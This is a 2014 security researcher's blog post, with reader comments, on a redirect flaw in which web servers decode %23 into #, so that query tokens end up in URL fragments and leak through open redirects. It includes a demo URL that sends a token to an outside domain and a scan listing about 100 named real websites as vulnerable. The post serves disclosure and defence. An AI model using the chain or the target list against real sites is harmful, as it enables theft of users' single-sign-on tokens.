Thursday, January 2, 2014

Path Encoding Vulnerability in https/www redirects.

Playing with 302-based header injection (majority of web servers is not vulnerable to it btw) i found one tricky neat bug which can be really useful to leak ?query data by putting them in the #fragment.

Remark about the difference: fragment might seem to be more secure than query - no, I don't think so. There are just thousands of open-redirects out there leaking access_token-s. I personally found an open redirect leaking user's token on 2 out of 3 huge websites i checked. I only stopped looking for open redirects because I don't exploit and there's no market for "facebook access_tokens" (let's create one?)... whatever

Yes, ?query can be leaked with Referrers but you can easily deny them - you never can't be sure you don't have open redirects.

Tip 1. do not send sensitive info in #fragment because 302 redirect will leak this data.

Problem: many web servers are configured in a way to redirect http://site.com/%23lol to http://www.site.com/#lol - they kill initial encoding, putting query data in location.hash. And this is a vulnerability.

To demonstrate the bug in the wild I created this demo. Hard Mode solution by the way: http://www.sakurity.com/issue_token?hard_mode=1&uri=http://sakurity.com/triple?to=//egorhomakov.com%2523

Any ?private_info can be turned into #private_info and be leaked easily with a 302 redirect.

Chain looks like this
Provider Issues a Token -> Client-WWW-redirector%23?Token -> Client-redirector#?Token -> Evil#?Token. 
There were basically only two ways servers could "screw" path encoding: https and www related redirects.

Tip 2. check https->http / www.site->site redirects to find Path Encoding Vulnerability. 

Let's check www-redirects against our Lazy list. Here is my lousy script.
For "/?x=%23x" payload almost nobody is vulnerable because encoding request.query seems obvious.

http://www.olx.in/?x=#x
http://www.target.com?&x=#x
http://www.force.com/?x=#x
http://www.retailmenot.com/?x=#x
http://www.chip.de/?x=#x
http://store.steampowered.com/?x=#x
http://www.iminent.com?x=#x

Let's check '/%23x'

http://www.amazon.com/#x
http://www.bing.com/#x
http://www.microsoft.com/#x
http://www.msn.com/#x
http://www.ask.com/#x
http://www.amazon.co.jp/#x
http://stackoverflow.com/#x
http://www.cnn.com/#x
http://imgur.com/#x
http://www.huffingtonpost.com/#x
/Error/NotFound?aspxerrorpath=/#x
http://www.amazon.de/#x
http://www.about.com/#x
http://www.godaddy.com/#x
http://vimeo.com/#x
http://www.dailymail.co.uk/#x
http://www.amazon.co.uk/#x
http://www.aol.com/#x
http://kickass.to/#x/
http://www.globo.com/#x
http://www.aweber.com/#x
http://www.theguardian.com/#x
http://www.salesforce.com/#x
http://www.espncricinfo.com/#x
http://statcounter.com/#x/
http://www.warriorforum.com/#x
http://mashable.com/#x/
http://www.nbcnews.com/#x
http://www.shutterstock.com/#x
http://www.amazon.fr/#x
http://www.samsung.com/#x
http://www.popads.net/#x
http://pick.naver.jp/#x
http://www.usatoday.com/#x
http://stackexchange.com/#x
http://www.in.com/#x
http://bit.ly/a/warning?url=http%3a%2f%2fwww%2evirtual4now%2ecom&hash=#x
http://www.olx.in/#x
http://www.gsmarena.com/#x
http://www.ndtv.com/#x
http://www.ign.com/#x
http://www.varzesh3.com/#x
http://www.linkbucks.com/#x
http://www.webmd.com/#x
http://www.ig.com.br/#x
http://www.bitauto.com/#x/
http://www.hdfcbank.com/#x
http://www.dell.com/#x
http://www.force.com/#x
http://www.speedtest.net/#x
http://www.cbssports.com/#x
http://www.quora.com/#x
http://www.time.com/#x
http://www.amazon.cn/#x
http://www.retailmenot.com/#x
http://www.match.com/#x
http://subscene.com/#x
http://www.amazon.it/#x
http://abcnews.go.com/#x
http://www.timeanddate.com/#x
http://www.engadget.com/#x
http://www.corriere.it/#x
http://chaturbate.com/#x
http://www.swagbucks.com/#x
https://www4.gotomeeting.com/#x?Portal=gotomeeting.com
http://www.lemonde.fr/#x
http://www.chip.de/#x
http://www.hubspot.com/#x
http://www.pconline.com.cn/#x
http://www.marketwatch.com/#x
https://www.namecheap.com/#x
http://adultfriendfinder.com/#x
http://www.majesticseo.com/#x
http://msn.foxsports.com/#x
http://www.eventbrite.com/#x
http://www.virgilio.it/#x
http://www.tradedoubler.com/#x
http://www.autohome.com.cn/#x
http://persianblog.ir/#x
http://allrecipes.com/#x
http://www.lanacion.com.ar/#x
http://www.cbsnews.com/#x
http://www.tomshardware.com/#x
http://www.dict.cc/?s=#x
http://www.amazon.es/#x
http://www.pclady.com.cn/#x
http://vitaminl.tv/#x
http://www.spankwire.com/#x
http://www.ancestry.com/#x
http://ezinearticles.com/#x
http://www.aizhan.com/#x
http://www.rednet.cn/#x
http://www.mynet.com/#x
http://www.theverge.com/#x
http://www.allocine.fr/#x
http://www.pcbaby.com.cn/#x
http://www.chron.com/#x
/404.aspx?aspxerrorpath=/#x
http://myegy.com/#x
....i killed the script , it's only first 500.

Check if your server turns %23 into # and patch it if you don't want your Single Sign On to be hacked.
Be careful with encodings. Many servers are configured in a wrong way + Microsoft IIS is vulnerable by default.

5 comments:

  1. Встречали такое, ога :)

    ReplyDelete
  2. About "Microsoft IIS is vulnerable by default..." you are quite wrong, just IIS 6.5 is vulnerable, and only if the IT doesn't install the patch, but 99% IIS 6.5 are fixed.

    Just a remark apache and nginx are also vulnerable by default, if you don't know how to configure them.

    ;)

    ReplyDelete
    Replies
    1. really? do you have 6.5+ demo online i could check?

      I assumed last version is vulnerable because all MS sites like microsoft.com and hotmail.com were left vulnerable.

      on top of that IIS security team doesn't understand the issue

      Delete
    2. hi there egor, im reading all your post since early 2013. can i ask something? can you give me your email? im gonna tell / ask something, i recently found a bug on facebook and i need your help in confirming it, thanks in advance.

      Here is my email if you want to email me: tolstoivladimir@gmail.com

      -Vladimir

      Delete